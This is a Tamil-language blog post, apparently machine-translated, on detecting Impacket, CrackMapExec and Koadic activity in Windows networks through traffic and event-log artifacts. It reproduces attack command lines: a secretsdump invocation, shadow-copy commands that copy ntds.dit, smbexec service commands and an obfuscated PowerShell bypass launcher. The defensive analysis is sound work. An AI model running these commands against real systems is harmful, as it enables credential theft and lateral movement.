புரோஹோஸ்டர் > Блог > நிர்வாகம் > விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது

கார்ப்பரேட் துறையில் தாக்குதல்களின் எண்ணிக்கை ஒவ்வொரு ஆண்டும் அதிகரித்து வருகிறது: உதாரணமாக 2017 இல், 13% அதிகமான தனிப்பட்ட சம்பவங்கள் பதிவு செய்யப்பட்டன 2016 ஐ விட, மற்றும் 2018 இறுதியில் - 27% அதிகமான சம்பவங்கள்முந்தைய காலத்தை விட. விண்டோஸ் இயங்குதளம் முக்கிய வேலை செய்யும் கருவியாக உள்ளவை உட்பட. 2017-2018 இல், APT டிராகன்ஃபிளை, APT28, APT மட்டி வாட்டர் ஐரோப்பா, வட அமெரிக்கா மற்றும் சவுதி அரேபியாவில் உள்ள அரசு மற்றும் இராணுவ அமைப்புகள் மீது தாக்குதல்களை நடத்தியது. இதற்கு நாங்கள் மூன்று கருவிகளைப் பயன்படுத்தினோம் - இம்பாக்கெட், CrackMapExec и கோடிக். அவற்றின் மூலக் குறியீடு திறந்திருக்கும் மற்றும் கிட்ஹப்பில் கிடைக்கும்.

இந்த கருவிகள் ஆரம்ப ஊடுருவலுக்குப் பயன்படுத்தப்படுவதில்லை, ஆனால் உள்கட்டமைப்பிற்குள் ஒரு தாக்குதலை உருவாக்கப் பயன்படுகிறது என்பது குறிப்பிடத்தக்கது. சுற்றளவு ஊடுருவலைத் தொடர்ந்து தாக்குபவர்கள் தாக்குதலின் வெவ்வேறு கட்டங்களில் அவற்றைப் பயன்படுத்துகின்றனர். இது, மூலம், கண்டறிய கடினமாக உள்ளது மற்றும் பெரும்பாலும் தொழில்நுட்ப உதவியுடன் மட்டுமே பிணைய போக்குவரத்தில் சமரசத்தின் தடயங்களை அடையாளம் காணுதல் அல்லது அனுமதிக்கும் கருவிகள் உள்கட்டமைப்பில் ஊடுருவிய பிறகு, தாக்குபவர் செயலில் உள்ள செயல்களைக் கண்டறிதல். கருவிகள் கோப்புகளை மாற்றுவது முதல் பதிவேட்டுடன் தொடர்புகொள்வது மற்றும் தொலை கணினியில் கட்டளைகளை இயக்குவது வரை பல்வேறு செயல்பாடுகளை வழங்குகிறது. இந்த கருவிகளின் நெட்வொர்க் செயல்பாட்டை தீர்மானிக்க, நாங்கள் ஆய்வு செய்தோம்.

நாம் என்ன செய்ய வேண்டும்:

  • ஹேக்கிங் கருவிகள் எவ்வாறு செயல்படுகின்றன என்பதைப் புரிந்து கொள்ளுங்கள். தாக்குபவர்கள் எதைப் பயன்படுத்த வேண்டும் மற்றும் அவர்கள் என்ன தொழில்நுட்பங்களைப் பயன்படுத்தலாம் என்பதைக் கண்டறியவும்.
  • தாக்குதலின் முதல் கட்டங்களில் தகவல் பாதுகாப்புக் கருவிகளால் கண்டறியப்படாதவற்றைக் கண்டறியவும். தாக்குபவர் உள் தாக்குதலாளியாக இருப்பதால் அல்லது தாக்குபவர் உள்கட்டமைப்பில் முன்னர் அறியப்படாத ஒரு ஓட்டையைப் பயன்படுத்துவதால், உளவுப் பகுதி தவிர்க்கப்படலாம். அவரது செயல்களின் முழு சங்கிலியையும் மீட்டெடுப்பது சாத்தியமாகும், எனவே மேலும் இயக்கத்தைக் கண்டறிய ஆசை.
  • ஊடுருவல் கண்டறிதல் கருவிகளில் இருந்து தவறான நேர்மறைகளை அகற்றவும். உளவுத்துறையின் அடிப்படையில் மட்டும் சில செயல்கள் கண்டறியப்படும்போது, ​​அடிக்கடி பிழைகள் ஏற்பட வாய்ப்புள்ளது என்பதை நாம் மறந்துவிடக் கூடாது. பொதுவாக உள்கட்டமைப்பில் எந்தவொரு தகவலையும் பெறுவதற்கு, முதல் பார்வையில் முறையானவற்றிலிருந்து பிரித்தறிய முடியாத, போதுமான எண்ணிக்கையிலான வழிகள் உள்ளன.

இந்த கருவிகள் தாக்குபவர்களுக்கு என்ன கொடுக்கின்றன? இது இம்பாக்கெட் என்றால், தாக்குபவர்கள் தொகுதிகளின் பெரிய நூலகத்தைப் பெறுகிறார்கள், அவை சுற்றளவை உடைத்த பிறகு தாக்குதலின் வெவ்வேறு கட்டங்களில் பயன்படுத்தப்படலாம். பல கருவிகள் உள்நாட்டில் இம்பாக்கெட் தொகுதிகளைப் பயன்படுத்துகின்றன - எடுத்துக்காட்டாக, மெட்டாஸ்ப்ளோயிட். இது ரிமோட் கமாண்ட் எக்ஸிகியூஷனுக்கான dcomexec மற்றும் wmiexec ஐக் கொண்டுள்ளது, Impacket இலிருந்து சேர்க்கப்படும் நினைவகத்திலிருந்து கணக்குகளைப் பெறுவதற்கான secretsdump. இதன் விளைவாக, அத்தகைய நூலகத்தின் செயல்பாட்டைச் சரியாகக் கண்டறிவது வழித்தோன்றல்களைக் கண்டறிவதை உறுதி செய்யும்.

CrackMapExec (அல்லது வெறுமனே CME) பற்றி படைப்பாளிகள் "Powered by Impacket" என்று எழுதியது தற்செயல் நிகழ்வு அல்ல. கூடுதலாக, CME பிரபலமான காட்சிகளுக்கான ஆயத்த செயல்பாட்டைக் கொண்டுள்ளது: கடவுச்சொற்கள் அல்லது அவற்றின் ஹாஷ்களைப் பெறுவதற்கான Mimikatz, தொலைநிலைச் செயலாக்கத்திற்கான Meterpreter அல்லது Empire முகவரைச் செயல்படுத்துதல் மற்றும் Bloodhound போர்டில்.

நாங்கள் தேர்ந்தெடுத்த மூன்றாவது கருவி கோடிக். இது மிகவும் சமீபத்தியது, இது 25 இல் சர்வதேச ஹேக்கர் மாநாட்டில் DEFCON 2017 இல் வழங்கப்பட்டது மற்றும் தரமற்ற அணுகுமுறையால் வேறுபடுகிறது: இது HTTP, ஜாவா ஸ்கிரிப்ட் மற்றும் மைக்ரோசாஃப்ட் விஷுவல் பேசிக் ஸ்கிரிப்ட் (VBS) வழியாக செயல்படுகிறது. இந்த அணுகுமுறை நிலத்திலிருந்து வாழ்வது என்று அழைக்கப்படுகிறது: கருவியானது விண்டோஸில் கட்டமைக்கப்பட்ட சார்புகள் மற்றும் நூலகங்களின் தொகுப்பைப் பயன்படுத்துகிறது. படைப்பாளிகள் அதை COM கட்டளை & கட்டுப்பாடு அல்லது C3 என்று அழைக்கின்றனர்.

இம்பாக்கெட்

AD க்குள் உளவு பார்த்தல் மற்றும் உள் MS SQL சேவையகங்களிலிருந்து தரவைச் சேகரிப்பது, நற்சான்றிதழ்களைப் பெறுவதற்கான நுட்பங்கள் வரை Impacket இன் செயல்பாடு மிகவும் விரிவானது: இது ஒரு SMB ரிலே தாக்குதல் மற்றும் ஒரு டொமைன் கன்ட்ரோலரிடமிருந்து பயனர் கடவுச்சொற்களின் ஹாஷ்களைக் கொண்ட ntds.dit கோப்பைப் பெறுதல். WMI, Windows Scheduler Management Service, DCOM மற்றும் SMB ஆகிய நான்கு வெவ்வேறு முறைகளைப் பயன்படுத்தி இம்பேக்கெட் தொலைவிலிருந்து கட்டளைகளை இயக்குகிறது, மேலும் அவ்வாறு செய்வதற்கான சான்றுகள் தேவை.

சீக்ரெட்டம்ப்

சீக்ரெட்ஸ்டம்ப் பற்றி பார்ப்போம். இது பயனர் இயந்திரங்கள் மற்றும் டொமைன் கன்ட்ரோலர்கள் இரண்டையும் குறிவைக்கக்கூடிய ஒரு தொகுதியாகும். நினைவக பகுதிகளான LSA, SAM, SECURITY, NTDS.dit ஆகியவற்றின் நகல்களைப் பெற இது பயன்படுத்தப்படலாம், எனவே இது தாக்குதலின் வெவ்வேறு கட்டங்களில் காணப்படலாம். தொகுதியின் செயல்பாட்டின் முதல் படி SMB வழியாக அங்கீகாரம் ஆகும், இதற்கு பயனரின் கடவுச்சொல் அல்லது அதன் ஹாஷ் தானாகவே பாஸ் தி ஹாஷ் தாக்குதலை மேற்கொள்ள வேண்டும். அடுத்து சர்வீஸ் கண்ட்ரோல் மேனேஜர் (SCM)க்கான அணுகலைத் திறந்து, பதிவேட்டில் வின்ரெக் நெறிமுறையின் மூலம் அணுகலைப் பெறுவதற்கான கோரிக்கை வருகிறது, இதைப் பயன்படுத்தி தாக்குபவர் ஆர்வமுள்ள கிளைகளின் தரவைக் கண்டறிந்து SMB வழியாக முடிவுகளைப் பெறலாம்.

படத்தில். 1 Winreg நெறிமுறையைப் பயன்படுத்தும் போது, ​​LSA உடன் ஒரு பதிவக விசையைப் பயன்படுத்தி அணுகல் எவ்வாறு சரியாகப் பெறப்படுகிறது என்பதைப் பார்க்கிறோம். இதைச் செய்ய, opcode 15 - OpenKey உடன் DCERPC கட்டளையைப் பயன்படுத்தவும்.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 1. Winreg நெறிமுறையைப் பயன்படுத்தி ஒரு பதிவு விசையைத் திறக்கவும்

அடுத்து, விசைக்கான அணுகல் பெறப்படும் போது, ​​மதிப்புகள் opcode 20 உடன் SaveKey கட்டளையுடன் சேமிக்கப்படும். Impacket இதை ஒரு குறிப்பிட்ட வழியில் செய்கிறது. இது .tmp உடன் இணைக்கப்பட்ட 8 சீரற்ற எழுத்துகளின் சரம் கொண்ட கோப்பில் மதிப்புகளைச் சேமிக்கிறது. கூடுதலாக, இந்த கோப்பின் மேலும் பதிவேற்றம் System32 கோப்பகத்திலிருந்து SMB வழியாக நிகழ்கிறது (படம் 2).

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 2. ரிமோட் மெஷினிலிருந்து ரெஜிஸ்ட்ரி கீயைப் பெறுவதற்கான திட்டம்

வின்ரெக் நெறிமுறை, குறிப்பிட்ட பெயர்கள், கட்டளைகள் மற்றும் அவற்றின் வரிசையைப் பயன்படுத்தி சில பதிவேட்டில் கிளைகளுக்கான வினவல்களால் நெட்வொர்க்கில் இத்தகைய செயல்பாடு கண்டறியப்படலாம்.

இந்த தொகுதி விண்டோஸ் நிகழ்வு பதிவில் தடயங்களை விட்டுச்செல்கிறது, இது கண்டறிவதை எளிதாக்குகிறது. எடுத்துக்காட்டாக, கட்டளையை செயல்படுத்துவதன் விளைவாக

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

விண்டோஸ் சர்வர் 2016 பதிவில் பின்வரும் முக்கிய நிகழ்வுகளின் வரிசையைக் காண்போம்:

1. 4624 - தொலை உள்நுழைவு.
2. 5145 - winreg ரிமோட் சேவைக்கான அணுகல் உரிமைகளை சரிபார்க்கிறது.
3. 5145 - System32 கோப்பகத்தில் கோப்பு அணுகல் உரிமைகளைச் சரிபார்க்கிறது. கோப்பில் மேலே குறிப்பிடப்பட்ட சீரற்ற பெயர் உள்ளது.
4. 4688 - vssadmin ஐத் தொடங்கும் cmd.exe செயல்முறையை உருவாக்குதல்:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - கட்டளையுடன் ஒரு செயல்முறையை உருவாக்குதல்:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - கட்டளையுடன் ஒரு செயல்முறையை உருவாக்குதல்:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - கட்டளையுடன் ஒரு செயல்முறையை உருவாக்குதல்:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

பல பிந்தைய சுரண்டல் கருவிகளைப் போலவே, இம்பாக்கெட்டில் கட்டளைகளை தொலைவிலிருந்து இயக்குவதற்கான தொகுதிகள் உள்ளன. தொலை கணினியில் ஊடாடும் கட்டளை ஷெல் வழங்கும் smbexec இல் கவனம் செலுத்துவோம். இந்த தொகுதிக்கு கடவுச்சொல் அல்லது கடவுச்சொல் ஹாஷ் மூலம் SMB வழியாக அங்கீகாரம் தேவைப்படுகிறது. படத்தில். படம் 3 இல், அத்தகைய கருவி எவ்வாறு செயல்படுகிறது என்பதற்கான உதாரணத்தைக் காண்கிறோம், இந்த விஷயத்தில் இது உள்ளூர் நிர்வாகி கன்சோலாகும்.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 3. ஊடாடும் smbexec கன்சோல்

அங்கீகாரத்திற்குப் பிறகு smbexec இன் முதல் படி SCM ஐ OpenSCManagerW கட்டளையுடன் திறக்க வேண்டும் (15). வினவல் குறிப்பிடத்தக்கது: MachineName புலம் DUMMY.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 4. சேவைக் கட்டுப்பாட்டு மேலாளரைத் திறக்க கோரிக்கை

அடுத்து, CreateServiceW கட்டளையைப் பயன்படுத்தி சேவை உருவாக்கப்படுகிறது (12). smbexec விஷயத்தில், ஒவ்வொரு முறையும் ஒரே கட்டளை கட்டுமான தர்க்கத்தை நாம் பார்க்கலாம். படத்தில். 5 பச்சை என்பது மாற்ற முடியாத கட்டளை அளவுருக்களைக் குறிக்கிறது, மஞ்சள் தாக்குபவர் எதை மாற்ற முடியும் என்பதைக் குறிக்கிறது. இயங்கக்கூடிய கோப்பின் பெயர், அதன் அடைவு மற்றும் வெளியீட்டு கோப்பின் பெயர் மாற்றப்படலாம் என்பதைக் காண்பது எளிது, ஆனால் மற்றவை இம்பேக்கெட் தொகுதியின் தர்க்கத்திற்கு இடையூறு இல்லாமல் மாற்றுவது மிகவும் கடினம்.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 5. சேவைக் கட்டுப்பாட்டு மேலாளரைப் பயன்படுத்தி ஒரு சேவையை உருவாக்குவதற்கான கோரிக்கை

Smbexec விண்டோஸ் நிகழ்வு பதிவில் வெளிப்படையான தடயங்களையும் விட்டுச்செல்கிறது. ipconfig கட்டளையுடன் ஊடாடும் கட்டளை ஷெல்லுக்கான Windows Server 2016 பதிவில், பின்வரும் நிகழ்வுகளின் முக்கிய வரிசையைக் காண்போம்:

1. 4697 - பாதிக்கப்பட்டவரின் கணினியில் சேவையை நிறுவுதல்:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - புள்ளி 1 இலிருந்து வாதங்களுடன் cmd.exe செயல்முறையை உருவாக்குதல்.
3. 5145 - C$ கோப்பகத்தில் __அவுட்புட் கோப்பிற்கான அணுகல் உரிமைகளைச் சரிபார்க்கிறது.
4. 4697 - பாதிக்கப்பட்டவரின் கணினியில் சேவையை நிறுவுதல்.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - புள்ளி 4 இலிருந்து வாதங்களுடன் cmd.exe செயல்முறையை உருவாக்குதல்.
6. 5145 - C$ கோப்பகத்தில் __அவுட்புட் கோப்பிற்கான அணுகல் உரிமைகளைச் சரிபார்க்கிறது.

தாக்குதல் கருவிகளின் வளர்ச்சிக்கு இம்பேக்கெட் அடிப்படையாகும். இது விண்டோஸ் உள்கட்டமைப்பில் கிட்டத்தட்ட அனைத்து நெறிமுறைகளையும் ஆதரிக்கிறது மற்றும் அதே நேரத்தில் அதன் சொந்த சிறப்பியல்பு அம்சங்களைக் கொண்டுள்ளது. இங்கே குறிப்பிட்ட winreg கோரிக்கைகள், மற்றும் SCM API இன் பயன்பாடு மற்றும் பண்பு கட்டளை உருவாக்கம், மற்றும் கோப்பு பெயர் வடிவம் மற்றும் SMB பகிர்வு SYSTEM32.

கிராக்மேபெக்செக்

CME கருவி முதன்மையாக நெட்வொர்க்கிற்குள் முன்னேற தாக்குபவர் செய்ய வேண்டிய வழக்கமான செயல்களை தானியக்கமாக்க வடிவமைக்கப்பட்டுள்ளது. இது நன்கு அறியப்பட்ட எம்பயர் ஏஜென்ட் மற்றும் Meterpreter உடன் இணைந்து பணியாற்ற உங்களை அனுமதிக்கிறது. கட்டளைகளை இரகசியமாக இயக்க, CME அவற்றை தெளிவடையச் செய்யலாம். Bloodhound (ஒரு தனி உளவு கருவி) பயன்படுத்தி, தாக்குபவர் செயலில் உள்ள டொமைன் நிர்வாகி அமர்வுக்கான தேடலை தானியங்குபடுத்த முடியும்.

ப்ளூட்ஹண்ட்

Bloodhound, ஒரு முழுமையான கருவியாக, நெட்வொர்க்கிற்குள் மேம்பட்ட உளவு பார்க்க அனுமதிக்கிறது. இது பயனர்கள், இயந்திரங்கள், குழுக்கள், அமர்வுகள் பற்றிய தரவுகளை சேகரிக்கிறது மற்றும் பவர்ஷெல் ஸ்கிரிப்ட் அல்லது பைனரி கோப்பாக வழங்கப்படுகிறது. தகவல்களைச் சேகரிக்க LDAP அல்லது SMB அடிப்படையிலான நெறிமுறைகள் பயன்படுத்தப்படுகின்றன. CME ஒருங்கிணைப்பு தொகுதியானது பாதிக்கப்பட்டவரின் இயந்திரத்திற்கு Bloodhound ஐ பதிவிறக்கம் செய்து, செயல்படுத்தப்பட்ட பிறகு சேகரிக்கப்பட்ட தரவை இயக்கி பெற அனுமதிக்கிறது, இதன் மூலம் கணினியில் செயல்களை தானியங்குபடுத்துகிறது மற்றும் அவற்றை குறைவாக கவனிக்க வைக்கிறது. Bloodhound வரைகலை ஷெல் சேகரிக்கப்பட்ட தரவை வரைபடங்களின் வடிவத்தில் வழங்குகிறது, இது தாக்குபவர் இயந்திரத்திலிருந்து டொமைன் நிர்வாகிக்கு குறுகிய பாதையைக் கண்டறிய உங்களை அனுமதிக்கிறது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 6. Bloodhound இடைமுகம்

பாதிக்கப்பட்டவரின் கணினியில் இயங்க, தொகுதி ATSVC மற்றும் SMB ஐப் பயன்படுத்தி ஒரு பணியை உருவாக்குகிறது. ATSVC என்பது Windows Task Scheduler உடன் பணிபுரிவதற்கான ஒரு இடைமுகமாகும். நெட்வொர்க்கில் பணிகளை உருவாக்க CME அதன் NetrJobAdd(1) செயல்பாட்டைப் பயன்படுத்துகிறது. CME தொகுதி என்ன அனுப்புகிறது என்பதற்கான எடுத்துக்காட்டு படம். 7: இது cmd.exe கட்டளை அழைப்பு மற்றும் XML வடிவத்தில் வாதங்களின் வடிவத்தில் தெளிவற்ற குறியீடு.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
படம்.7. CME மூலம் பணியை உருவாக்குதல்

பணியை நிறைவேற்றுவதற்குச் சமர்ப்பிக்கப்பட்ட பிறகு, பாதிக்கப்பட்டவரின் இயந்திரம் ப்ளட்ஹவுண்ட்டைத் தொடங்குகிறது, மேலும் இது போக்குவரத்தில் காணப்படுகிறது. தொகுதியானது நிலையான குழுக்களைப் பெறுவதற்கான LDAP வினவல்களால் வகைப்படுத்தப்படுகிறது, டொமைனில் உள்ள அனைத்து இயந்திரங்கள் மற்றும் பயனர்களின் பட்டியல் மற்றும் SRVSVC NetSessEnum கோரிக்கை மூலம் செயலில் உள்ள பயனர் அமர்வுகள் பற்றிய தகவலைப் பெறுகிறது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 8. SMB வழியாக செயலில் உள்ள அமர்வுகளின் பட்டியலைப் பெறுதல்

கூடுதலாக, தணிக்கை இயக்கப்பட்ட ஒரு பாதிக்கப்பட்டவரின் கணினியில் Bloodhound ஐ ஏவுவது, ID 4688 (செயல்முறை உருவாக்கம்) மற்றும் செயல்முறைப் பெயருடன் கூடிய நிகழ்வுடன் இருக்கும். «C:WindowsSystem32cmd.exe». இதில் குறிப்பிடத்தக்கது கட்டளை வரி வாதங்கள்:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

செயல்பாடு மற்றும் செயலாக்கத்தின் பார்வையில் enum_avproducts தொகுதி மிகவும் சுவாரஸ்யமானது. பல்வேறு Windows ஆப்ஜெக்ட்களிலிருந்து தரவை மீட்டெடுக்க WQL வினவல் மொழியைப் பயன்படுத்த WMI உங்களை அனுமதிக்கிறது, இது முக்கியமாக இந்த CME தொகுதி பயன்படுத்துகிறது. இது AntiSpywareProduct மற்றும் AntiMirusProduct வகுப்புகளுக்கு பாதிக்கப்பட்டவரின் கணினியில் நிறுவப்பட்டுள்ள பாதுகாப்புக் கருவிகளைப் பற்றிய வினவல்களை உருவாக்குகிறது. தேவையான தரவைப் பெற, தொகுதி ரூட்செக்யூரிட்டி சென்டர்2 பெயர்வெளியுடன் இணைக்கிறது, பின்னர் ஒரு WQL வினவலை உருவாக்கி பதிலைப் பெறுகிறது. படத்தில். அத்தகைய கோரிக்கைகள் மற்றும் பதில்களின் உள்ளடக்கங்களை படம் 9 காட்டுகிறது. எங்கள் எடுத்துக்காட்டில், விண்டோஸ் டிஃபென்டர் கண்டுபிடிக்கப்பட்டது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 9. enum_avproducts தொகுதியின் பிணைய செயல்பாடு

பெரும்பாலும், WMI தணிக்கை (டிரேஸ் டபிள்யூஎம்ஐ-செயல்பாடு), அதன் நிகழ்வுகளில் நீங்கள் WQL வினவல்களைப் பற்றிய பயனுள்ள தகவல்களைக் காணலாம், முடக்கப்படலாம். ஆனால் அது இயக்கப்பட்டிருந்தால், enum_avproducts ஸ்கிரிப்ட் இயக்கப்பட்டால், ID 11 உடன் ஒரு நிகழ்வு சேமிக்கப்படும். அதில் கோரிக்கையை அனுப்பிய பயனரின் பெயரும், rootSecurityCenter2 பெயர்வெளியில் பெயரும் இருக்கும்.

ஒவ்வொரு CME தொகுதிகளும் அதன் சொந்த கலைப்பொருட்களைக் கொண்டிருந்தன, அது குறிப்பிட்ட WQL வினவல்கள் அல்லது LDAP மற்றும் SMB இல் தெளிவற்ற மற்றும் Bloodhound-குறிப்பிட்ட செயல்பாடுகளுடன் பணி திட்டமிடலில் ஒரு குறிப்பிட்ட வகை பணியை உருவாக்குதல்.

கோடிக்

விண்டோஸில் கட்டமைக்கப்பட்ட ஜாவாஸ்கிரிப்ட் மற்றும் விபிஸ்கிரிப்ட் மொழிபெயர்ப்பாளர்களின் பயன்பாடு கோடிக்கின் தனித்துவமான அம்சமாகும். இந்த அர்த்தத்தில், இது நிலப் போக்கின் வாழ்க்கையைப் பின்தொடர்கிறது - அதாவது, இது வெளிப்புற சார்புகள் இல்லை மற்றும் நிலையான விண்டோஸ் கருவிகளைப் பயன்படுத்துகிறது. இது முழு கட்டளை மற்றும் கட்டுப்பாட்டுக்கான (CnC) கருவியாகும், ஏனெனில் தொற்றுக்குப் பிறகு கணினியில் ஒரு "உள்வைப்பு" நிறுவப்பட்டு, அதைக் கட்டுப்படுத்த அனுமதிக்கிறது. அத்தகைய இயந்திரம், கோடிக் சொற்களில், "ஜாம்பி" என்று அழைக்கப்படுகிறது. பாதிக்கப்பட்டவரின் தரப்பில் முழு செயல்பாட்டிற்கு போதுமான சலுகைகள் இல்லை என்றால், பயனர் கணக்கு கட்டுப்பாட்டு பைபாஸ் (UAC பைபாஸ்) நுட்பங்களைப் பயன்படுத்தி அவற்றை உயர்த்தும் திறனை Koadic கொண்டுள்ளது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 10. கோடிக் ஷெல்

பாதிக்கப்பட்டவர் கட்டளை மற்றும் கட்டுப்பாட்டு சேவையகத்துடன் தொடர்பு கொள்ள வேண்டும். இதைச் செய்ய, அவள் முன்பு தயாரிக்கப்பட்ட URI ஐத் தொடர்புகொண்டு, ஸ்டேஜர்களில் ஒன்றைப் பயன்படுத்தி முக்கிய கோடிக் உடலைப் பெற வேண்டும். படத்தில். படம் 11 mshta ஸ்டேஜருக்கான உதாரணத்தைக் காட்டுகிறது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 11. CnC சேவையகத்துடன் ஒரு அமர்வைத் தொடங்குதல்

பதில் மாறி WS ஐ அடிப்படையாகக் கொண்டு, WScript.Shell மூலம் செயல்படுத்தல் நிகழ்கிறது என்பது தெளிவாகிறது, மேலும் STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ஆகிய மாறிகள் தற்போதைய அமர்வின் அளவுருக்கள் பற்றிய முக்கிய தகவல்களைக் கொண்டுள்ளன. இது CnC சேவையகத்துடன் HTTP இணைப்பில் உள்ள முதல் கோரிக்கை-பதில் ஜோடியாகும். அடுத்தடுத்த கோரிக்கைகள் நேரடியாக அழைக்கப்படும் தொகுதிகள் (உள்வைப்புகள்) செயல்பாட்டுடன் தொடர்புடையவை. அனைத்து கோடிக் தொகுதிகளும் CnC உடனான செயலில் உள்ள அமர்வுடன் மட்டுமே செயல்படும்.

மிமிகாட்ஸ்

CME Bloodhound உடன் வேலை செய்வது போல், Koadic Mimikatz உடன் ஒரு தனி நிரலாக வேலை செய்கிறது மற்றும் அதைத் தொடங்க பல வழிகள் உள்ளன. மிமிகாட்ஸ் உள்வைப்பைப் பதிவிறக்குவதற்கான கோரிக்கை-பதில் ஜோடி கீழே உள்ளது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 12. Mimikatz ஐ Koadic க்கு மாற்றவும்

கோரிக்கையில் உள்ள URI வடிவம் எவ்வாறு மாறியுள்ளது என்பதை நீங்கள் பார்க்கலாம். இது இப்போது csrf மாறிக்கான மதிப்பைக் கொண்டுள்ளது, இது தேர்ந்தெடுக்கப்பட்ட தொகுதிக்கு பொறுப்பாகும். அவள் பெயரைக் கவனிக்காதே; பொதுவாக CSRF என்பது வித்தியாசமாகப் புரிந்து கொள்ளப்படுவது நாம் அனைவரும் அறிந்ததே. மீமிகாட்ஸுடன் தொடர்புடைய குறியீடு சேர்க்கப்பட்ட கோடிக்கின் அதே முக்கிய அம்சம்தான் பதில். இது மிகவும் பெரியது, எனவே முக்கிய புள்ளிகளைப் பார்ப்போம். இங்கே Mimikatz நூலகம் Base64 இல் குறியிடப்பட்டுள்ளது, ஒரு வரிசைப்படுத்தப்பட்ட .NET வகுப்பு, அதை உட்செலுத்தும் மற்றும் Mimikatz ஐ தொடங்குவதற்கான வாதங்கள். செயல்பாட்டின் முடிவு தெளிவான உரையில் பிணையத்தில் அனுப்பப்படுகிறது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 13. ரிமோட் மெஷினில் மிமிகாட்ஸை இயக்குவதன் முடிவு

Exec_cmd

கோடிக் கட்டளைகளை தொலைவிலிருந்து இயக்கக்கூடிய தொகுதிக்கூறுகளையும் கொண்டுள்ளது. இங்கே நாம் அதே URI தலைமுறை முறை மற்றும் நன்கு அறியப்பட்ட sid மற்றும் csrf மாறிகளைப் பார்ப்போம். exec_cmd தொகுதியின் விஷயத்தில், ஷெல் கட்டளைகளை செயல்படுத்தும் திறன் கொண்ட உடலில் குறியீடு சேர்க்கப்படும். CnC சேவையகத்தின் HTTP பதிலில் உள்ள அத்தகைய குறியீடு கீழே காட்டப்பட்டுள்ளது.

விண்டோஸ் உள்கட்டமைப்பு மீதான தாக்குதல்களைக் கண்டறிவது எப்படி: ஹேக்கர் கருவிகளைப் படிப்பது
அரிசி. 14. உள்வைப்பு குறியீடு exec_cmd

